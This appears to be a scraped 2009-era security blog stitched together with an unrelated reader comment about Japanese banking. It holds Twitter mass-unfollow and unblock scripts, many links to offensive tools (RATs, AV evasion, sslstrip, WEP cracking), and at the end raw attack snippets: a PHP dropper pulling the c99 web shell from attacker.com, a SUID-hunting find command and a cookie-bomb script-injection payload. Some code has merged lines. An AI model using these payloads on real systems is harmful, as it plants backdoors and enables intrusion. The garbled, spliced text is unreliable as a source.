I created this script because I couldn’t really find anything out there for it. Both the Twitter support page and all the Twitter APIs out there had the ability to unblock people, but only if you knew who you wanted to unblock. Recently I tried the Twitter Karma service that could Mass unfollow / block people (hence my last couple scripts). I clicked the wrong button one time and it blocked a whole bunch of people. But say your not a klutz like me, maybe you just forgot who you’ve blocked over time.
This script will dump the list of people you block and unblock them all. Now you could expand this to get the names of each individual that you block but that’s an API call for each. Let me know if there is a better way, right now, the only way to figure out who was unblocked is through the 302 response that is generated with each request that sends you to the users page that you unblocked. (Push this script through a proxy to see it.)
#!/usr/bin/env ruby
require 'net/http'
require 'rexml/document'
include REXMLuse_proxy = false
proxy_srvr = "127.0.0.1"
proxy_port = "8080"
proxy_user = ""
proxy_pass = ""twitter_user = "joeuser"
twitter_pass = "password1"header = {
'User-Agent' => "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
'X-Requested-With' => "XMLHttpRequest",
'Cookie' => "__utma="
}data = "authenticity_token=&twttr=true"
doc = "temp"
if use_proxy == true
Net::HTTP::Proxy(proxy_srvr, proxy_port, proxy_user, proxy_pass).start('twitter.com') {|http|
req = Net::HTTP::Get.new('/blocks/blocking/ids.xml')
req.basic_auth twitter_user, twitter_pass
response = http.request(req)
doc = Document.new response.body
}
else
Net::HTTP.start('twitter.com') {|http|
req = Net::HTTP::Get.new('/blocks/blocking/ids.xml')
req.basic_auth twitter_user, twitter_pass
response = http.request(req)
doc = Document.new response.body
}
endblocks = doc.elements.each('//id') { |f|
if use_proxy == true
Net::HTTP::Proxy(proxy_srvr, proxy_port, proxy_user, proxy_pass).start('twitter.com') {|http|
req2 = '/blocks/destroy/' + f.text
response2 = http.post(req2, data, header)
puts response2.code
}
else
Net::HTTP.start('twitter.com') {|http|
req2 = '/blocks/destroy/' + f.text
response2 = http.post(req2, data, header)
puts response2.code
}
endputs "Unblocking: " + f.text
}
This is exactly like the last script with a few minor changes. 1st, the last script only has the ability to force people to unfollow you if you aren’t following them. 2nd, the api call and the request URL are different. GetFollowers instead of GetFriends, and friendships/remove instead of friendships/destroy. Don’t forget to fill in the same 4 fields that were missing/wrong in the last one.
#!/usr/bin/python
import twitter
import urllib2headers = {
'User-Agent' : "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
'Cookie' : "__utma=",
}data = "authenticity_token=&twttr=true"
api = twitter.Api(username='joeuser', password='password1')
for b in range(1,100):
users = api.GetFollowers(page=b)
for i in users:
request = http://twitter.com/friendships/remove/ + str(i.id)
req = urllib2.Request(request,data,headers)
post = urllib2.urlopen(req)
print post
I left the authenticity token and Cookie partially filled out so you know what to look for in your request. But basically you fill out those two variables, plus your user / pass of course and it will go through 100 pages of your followers, which should peg out your API calls. You’ll have to wait another hour to keep going, but you could easily put this on a loop until it you got down to 0. The out put could use a bit of cleaning up. You’ll need python-twitter, but BT4 and Ubuntu at least has it in it in their repos for easy install.
#!/usr/bin/python
import twitter
import urllib2headers = {
'User-Agent' : "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
'Cookie' : "__utma=",
}data = "authenticity_token=&twttr=true"
api = twitter.Api(username='joeuser', password='password1')
for b in range(1,100):
users = api.GetFriends(page=b)
for i in users:
request = "http://twitter.com/friendships/destroy/" + str(i.id)
req = urllib2.Request(request,data,headers)
post = urllib2.urlopen(req)
print post
akibako <nobody@nowhere.com> (unregistered) wrote:
I wholeheartedly agree with your main point. That said -- and I hate to be the one to split hairs -- I would argue that your Japanese citations are inaccurate.
Japanese people have and use credit cards all the time. According to the Bank for International Settlements, the number of Japanese credit card holders is roughly equal to that of Germany, and even exceeds Canada. It *is* true, however, that Japan does not have 'check cards', but this is simply because Japan does not have checks. The vast majority of cards in Japan work the system of automatically deducting the *entire* balance of the credit card once every month.
Getting a credit card just as easy as in the States. I got my first Japanese credit card after filling out a half-page form which took less than 5 minutes. No major form of identification was necessary. I get offers for "pre-approved" credit cards in my mail box every month.
Japanese people bank online constantly. Earlier this year, #2-seated cell phone carrier AU launched a partnership with Tokyo Mitsubishi UFJ Bank to access all of your banking functions over your cell phone, including balance transfers. It's been hugely popular, and other carriers have followed suit. The most profitable bank in Japan in 2004 was Shinsei Bank, which differentiates itself by essentially running an online-banking-only presence. Visiting a branch requires you to interface with your account using a PC, not a bank clerk.
Japanese people buy stuff online constantly. Last year, online sales figures per capita in Japan were only slightly below that of America.
In such a disaster-prone country as Japan, It would be short-sighted to assume that the Japanese government doesn't keep easily-backup-able electronic versions of important documents. My family registry, proof of residency, and marriage certificate are all given to me via a laser-printed document (made official by a number of stamps).
Stamps (hanko, inkan) are just as easy to copy -- if not more so -- as written signatures. Life is made infinitely more difficult for the average person as one usually has a number of these stamps in slight variations in design. They are the antithesis of simplicity. There are no records provided telling you which stamp was used for a given document. I've had documents rejected for not having the "correct" inkan, only to have the company later apologize for incorrect verification. The illusion of security is amplified by the perception among people that hanko/inkan are un-forgeable (password analogy, anyone). It is common practice for a business to accept a document from someone other than the document holder simply because it has the correct hanko. There have been numerous news stories of wives emptying their husband's bank accounts and fleeing the country.
The amount of data I push over my lines every month would *easily* be classified as "excessive use" (many times over). While it might be detected by the ISP, disconnections due to it are unheard of.
I agree with, and appreciate, the crux of your argument completely, but do not think that these specific examples from Japanese society are strong fodder.
Blocked from a specific download? On a pentest and don’t want your IP seen pulling a file? Doing malware analysis and don’t want to directly get a file? Here’s the solution:
I’m sure you’ll figure out how to use it that best fits your needs.
Really had to find (for me at least):
http://credentiality2.blogspot.com/2009/08/accelerated-video-on-dell-mini-10-with.html
This is THE way to get it working right.
This tool jaded me for any other screen capturing. I can’t live without it: (The following link is to the freeware version)
http://www.portablefreeware.com/?id=775
It went to trialware after 5.3 so you can download the version 6.5 at:
http://www.faststone.org/FSCaptureDetail.htm
It’s only 19.95 and adds a lot of features including a Screen Recorder.
Both versions are completely portable.
16 cool htaccess uses that help you get a better grip on it’s use:
http://www.thomsonchemmanoor.com/16-useful-htaccess-tricks-and-hacks-for-web-developers.html
This was talked about at Security BSides ( by @jcran ), and the video is on the site, but it boils down to a collaboration tool that is super fitted for pentesting.
I’m surprised I haven’t added this my links before:
CTUpdate 6.0 - http://www.h-online.com/security/Offline-Update--/features/112953
The USB stick option in 6.0 is sweet (which you could kinda already do if you knew what directory to copy)
Add this thing to a hacked U3 device to make it silently install updates for Windows / Office products makes a really quick update process.
This is one of those tools that doesn’t quite cross your mind until you see it’s power. DirSnatch is a one stop executable that you can give a customer of a web app sec test, they run it, and you get back a perfectly formatted text file for your testing needs of all their directories and files.
http://cktricky.blogspot.com/2009/08/source-code-of-dirsnatch.html
How to convert VBox machine to VMware
I figured it out!! YAY!!
"sudo qemu-img convert /home/emil/.VirtualBox/VDI/WindowsXP.vdi /home/emil/Desktop/XP.vmdk"
I'm not sure if need to be executed with "sudo" but that worked for me. Now I can switch to Vmware Virtual Machine from Virtual Box.
I’ve seen this before, and I think I’ve done this before, but it’s still awesome and I’m thinking about it’s use for doing training. Nothing says you can do it over the net. Haven’t tried.. yet:
http://www.nerdlogger.com/2008/01/stream-your-linuxwindowsmac-desktop-as.html
Trying to fix it so that my site didn’t say it was sponsored by “Car Dealers” I ran across an eval(gzinflate(base64_decode( encoded message. Google came up with this 2006 post:
http://danilo.ariadoss.com/decoding-eval-gzinflate-base64-decode/
But that didn’t work for me for some reason, but the online one I found later worked like a charm:
Kalgecin has two great tools over at his Google code page.
Crack.pl - md5/sha1cracker, works with dictionaries as well as rainbowtables. Or so it says. I haven’t tested yet.
MetaScanner – Kinda like db_autopwn but a lot more customizable.
Sébastien Raveau posted a great article back in June about all the different ways of getting internet access when that access is restricted. I tweeted about it and talked about it but never put it here, and I always have a hard time re-finding his site (this is my only bookmarking)
http://blog.sebastien.raveau.name/2009/06/internet-by-all-means.html
Definitely check it out if you haven’t already.
Yes.. people still use Usenet. And this is a great way of accessing those pirated movies in-depth technical discussions.
Source: http://www.ghacks.net/2009/07/23/a-web-interface-for-newsgroups-downloads/
A database driven wardriving / wep cracking machine.
Original post: http://www.phonelosers.com/index.php?topic=4209.0
“New Site”: http://wardrivesql.info/
Makers of BeEF (Browser Exploitation Framework) have a bunch of other great tools:
http://www.bindshell.net/tools
Echo Mirage is one I have a lot of fun with. And Dnetj is a REALLY useful setup if you can get it going on some beefy boxes.
http://www.phx2600.org/archive/2008/08/29/metacab/
Metacab is a cabinet file that contains Netcat, Nmap, VNC and other remote administration utilities that need only a Windows command shell, cmd.exe, to install and use. Install and uninstall scripts are included, and work is being completed on antivirus evasion.
By @diginina
http://www.digininja.org/cewl.php
By default, CeWL sticks to just the site you have specified and will go to a depth of 2 links, this behavior can be changed by passing arguments. Be careful if setting a large depth and allowing it to go offsite, you could end up drifting on to a lot of other domains. All words of three characters and over are output to stdout. This length can be increased and the words can be written to a file rather than screen so the app can be automated.
Version 2 of CeWL can also create two new lists, a list of email addresses found in mailto links and a list of author/creator names collected from meta data found in documents on the site. It can currently process documents in Office pre 2007, Office 2007 and PDF formats. This user data can then be used to create the list of usernames to be used in association with the password list.
The “Collaborative RCE Tool Library” is an awesome list of tools used for RE, but as with all tools, they can be used in a ton of different ways
http://www.woodmann.com/collaborative/tools/index.php/Category:RCE_Tools
This is almost as bad as reading the IA32 Assembly manuals, but it’s a must read and it’s really not that long.
Everything you ever wanted to know about PE files:
http://msdn.microsoft.com/en-us/magazine/ms809762.aspx
Thanks cpwp from the Offensive Security forums for the link
It costs ($49) to get printed, but you can print it yourself. A great reference for anyone that has ever built a computer.
http://sonic840.deviantart.com/art/Computer-hardware-poster-1-7-111402099
This site checks your binaries against AV, packed and unpacked, then tells you what the best packer, if any would help you avoid AV. But remember, this means you are uploading your binary to a host that you don’t know.
Ncat adds many capabilities not found in Hobbit's original nc, including SSL support, proxy connections, IPv6, and connection brokering. The original nc contained a simple port scanner, but we omitted that from Ncat because we have a preferred tool for that function
Tim from the PenTest mailing list posted the following references that really delve deep into the Windows hive:
The Windows registry hive format is described here:
http://sentinelchicken.com/research/registry_format/
Also, some of Brendan Dolan-Gavitt's tools and blog
(http://moyix.blogspot.com/) posts may be helpful in figuring out
what's what in SAM hives.
“Insecure Programming by Example” http://community.corest.com/~gera/InsecureProgramming/
These are great tutorials that you can compile and find your zerodays in them. (oh , then send them to a friend, use ServifyThis to make it a service and have you very own vuln)
Ctrl-Alt-Del will save you ;-)
http://blog.rlr-uk.com/2009/06/trojan-keylogger-screensaver.html
A great project that allows documentation of network assets locally and over the network ;-) (SYDI). It does a lot that the Meterpreter script ‘winenum’ does, and a whole lot more. Most of it really doesn’t help you as an attacker, but it did spark a lot of good ideas, and sometimes you might not have the power of meterpreter at your beck & call.
Can’t believe I never posted this, it’s Moxie’s sslstrip tool from BH DC 2009. Does some amazing things to help MITM ssl sessions.
http://dev.zenoss.org/svn/trunk/wmi/
Thanks to Joe McCray of http://www.learnsecurityonline.com/ for the link!
If you haven’t seen this video yet, it’s well worth the 16 minutes of your life (yes it is a bit corny):
One of Garr Reynolds from Presentation Zen’s staples when creating a presentation is to use a unique font. Here is an amazing resource for handwritten fonts, which look GREAT on presentations:
http://www.hongkiat.com/blog/40-free-high-quality-hand-drawn-fonts/
http://whytheluckystiff.net/ruby/pickaxe/
An awesome online resource for learning Ruby
After a bunch of googling to find out what PEB was I happened upon this old milw0rm paper, which answered that question and the one I was going to ask next: How is it used in exploitation:
http://indefinitestudies.org/2009/01/22/digging-up-system-calls-ordinals-on-xp-x64/
I apologize for not remembering who tweeted this to thank them. But thanks to Daniel Reynaud for posting it.
Stolen from: http://blog.tenablesecurity.com/2009/05/scanning-monitoring-for-sctp.html
Paul goes into a lot of meat and potatoes about SCTP but the juice is here:
To scan for SCTP on your network and check if you are vulnerable using Nessue:
Enable “IP Protocols Scan” under the “Misc” plug-in family, and check “Thorough tests(slow)” in the Advanced tab of the scan policy under “Global Variable Settings”.
At the current time of posting, there are a 10 videos that as a security professional, you NEED to watch. It’s free training from some of the best in the biz. Bookmark it.
Fiddler is a web debugger, and watcher is a plug-in that adds security testing options to Fiddler.
http://www.fiddler2.com/fiddler2/
Watcher (Fiddler plug-in): http://websecuritytool.codeplex.com/
Here is a script David Kennedy (ReL1K) sent me a while back when we wrote a trojan for the Cyber Collegiate Defense Competition:
Just download py2exe, python setup.py install, then you have py2exe installed....
Say you have a file moo.py you want to compile, just take the code below and put it in a file called compile.py or something, modify it to change 'moo.py' to whatever py you want to compile and run python compile.py build py2exe and your all done. Super simple.
from distutils.core import setup
import py2exe, sys, os
# Hot Sex
sys.argv.append('py2exe')
setup(
options = {'py2exe': {'bundle_files': 1}},
console= [{'script': "moo.py"}],
zipfile = None,
)
Etherpad is a pastebin like site where you can edit on the fly… and so can a dozen other people. They actually do a REALLY good job at monitoring changes from everyone. There is also a chat feature, that way you aren’t notepad chatting, and an IMPORT functionality. Importing is great when your clipboard buffer just might not be good enough:
.. just wow.. (Google check them out, they nailed something you are STILL having problems with, but of course, you are still in BETA)
A really good list of extensions. The best way to do this is keep multiple copies of Portable Firefox with the addons. I would suggest naming the directories for each copy of Firefox accordingly and also editing their configuration to allow simultaneous starting and altering the title bar so that you can differentiate between the multiple instances.
https://addons.mozilla.org/en-US/firefox/collection/webappsec
I hope to be using these links to use as part of .. you know what… I forgot, but I know it will come back to me and I’ll need these links, so I am storing them here. Muhahahah..
http://msdn.microsoft.com/en-us/library/ms738545(VS.85).aspx
CORE’s write-up + code: http://www.coresecurity.com/content/ie-security-zone-bypass
MS09-019 advisory: http://www.microsoft.com/technet/security/Bulletin/MS09-019.mspx
CSO interviewed Chris Nickerson and he showed a reporter 5 security problems a random office building had before he ever entered the building:
Registry Key:
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\ScForceOption
Off Setting: DWORD=0
On Setting: DWORD=1
This option can make Kon-boot, OFFLINE NT PASSWORD RESET and some of HIREN’s PASSWORD tools pretty useless. But wait.. Can’t you edit the registry offline? Yup! (Be sure to pull the plug because “Computer” policies are applied BEFORE the logon prompt appears)
On the Security Focus: Penetration Testing List there was a great set of links to lists of tools:
http://securitytoolslist.domandhost.com/
http://www.security-database.com/toolswatch/
http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html
http://backtrack.offensive-security.com/index.php/Tools
http://www.indianz.ch/ – Haven’t seen this one before. HUGE list of ‘interesting’ files.
And a VOIP specific list: http://www.voipsa.org/Resources/tools.php
So IronGeek puts out tons of videos and some pretty sweet tools. This one is no less awesome:
http://www.irongeek.com/i.php?page=security/arpfreeze-static-arp-poisoning
So, yes, it can change your MAC address on your Windows box, but it does A LOT more. Definitely something to pull around with you on a USB stick.
Probably the best way of getting hands on a Cisco without buying one off of eBay. Tons of features and probably the only sim I’ve worked with that has the complete feature set of the actual devices. (Probably because you have to supply it with a real IOS file)
Chris Eng does a good job at explaining what you need to know:
http://video.google.com/videoplay?docid=-5187022592682372937
I don’t work with ISO standards, but definitely worth keeping the link
And on twitter: http://twitter.com/praxiom
http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2009/04/19/JOBSryan.DTL
There are tons of scanners/testers on the market, but this one’s feature set kinda caught my eye:
http://pentestit.com/2009/06/04/sandcat-advanced-web-application-security-tester/
As of now, the SandCat will scan for these fault injections:
* Buffer Overflow
* Cookie Manipulation
* Command Execution
* CRLF Injection
* Cross Frame Scripting
* Cross-Site Scripting (XSS)
* Default Account
* Directory Listing
* Directory Traversal
* File Inclusion
* Information Disclosure
* LDAP Injection
* MX Injection
* Password Disclosure
* Path Disclosure
* PHP Code Injection
* Server-Specific Vulnerabilities: IIS / iPlanet / Others
* Source Code Disclosure
* SQL Injection
* XPath Injection
* Miscellaneous
A very well written article on some of the history and details of what a “rootkit” is:
http://www.omninerd.com/articles/r00tkit_Analysis_What_Is_A_Rootkit/print_friendly
Here are just some sites that I wanted to get off my open tabs and check out later – standard warning applies, do not inherently trust what you find on these pages:
http://www.darkc0de.com/index.shtml
http://trythis0ne.com/?page=toolz
http://avhackers.com/index.php
http://www.megapanzer.com (Yes you have seen this one before, but in reference to their RAT)
================================
Un.Aware eZine ( http://www.awarenetwork.org/etc/)
Uninformed eZine ( http://uninformed.org/? )
Phrack eZine ( http://phrack.org/ )
Phrack issue #64 by TCOLH - “A brief history of the Underground scene: ( http://phrack.org/issues.html?issue=64&id=4&mode=txt )
tail -f
less +F /var/log/messages
a big hairy fuzzy spider that crawls your site, wreaking havoc
Attackers frequently take advantage of vulnerabilities in ActiveX controls to compromise systems using Microsoft Internet Explorer. A programming or design flaw in an ActiveX control can allow an attacker to execute arbitrary code by convincing a user to view a specially crafted web page. Since 2000, we have seen a significant increase in vulnerabilities in ActiveX controls.
We have developed Dranzer, a tool that enables users to examine effective techniques for fuzz testing ActiveX controls. By testing a large number of ActiveX controls, we can provide some insight into the current state of ActiveX security. When we discover new vulnerabilities, we practice responsible disclosure principles and perform the necessary remediation steps.
$shell = "http://attacker.com/c99madshell.txt"; //use something less obvious like readme.txt
$code = file_get_contents($shell);
$fp=fopen("Sh3ll.php","w+");
fwrite($fp, $code);
fclose($fp);
?>
find / -type f \( -perm -04000 -o -perm -02000 \) \-exec ls -lg {} \;
/*<script>/*code to create a 200KB of cookies per subdomain*/with(document)domain.replace(/[^.]*\.?/g,function(a){try{domain=domain.replace(a,"")}catch(e){a=""}finally{for(i=0;i<50;i++)cookie=i+"="+Array(4095)+";expires=9 Jan 2038 23:59 GMT;path=/;domain=."+a+domain}})//</script>
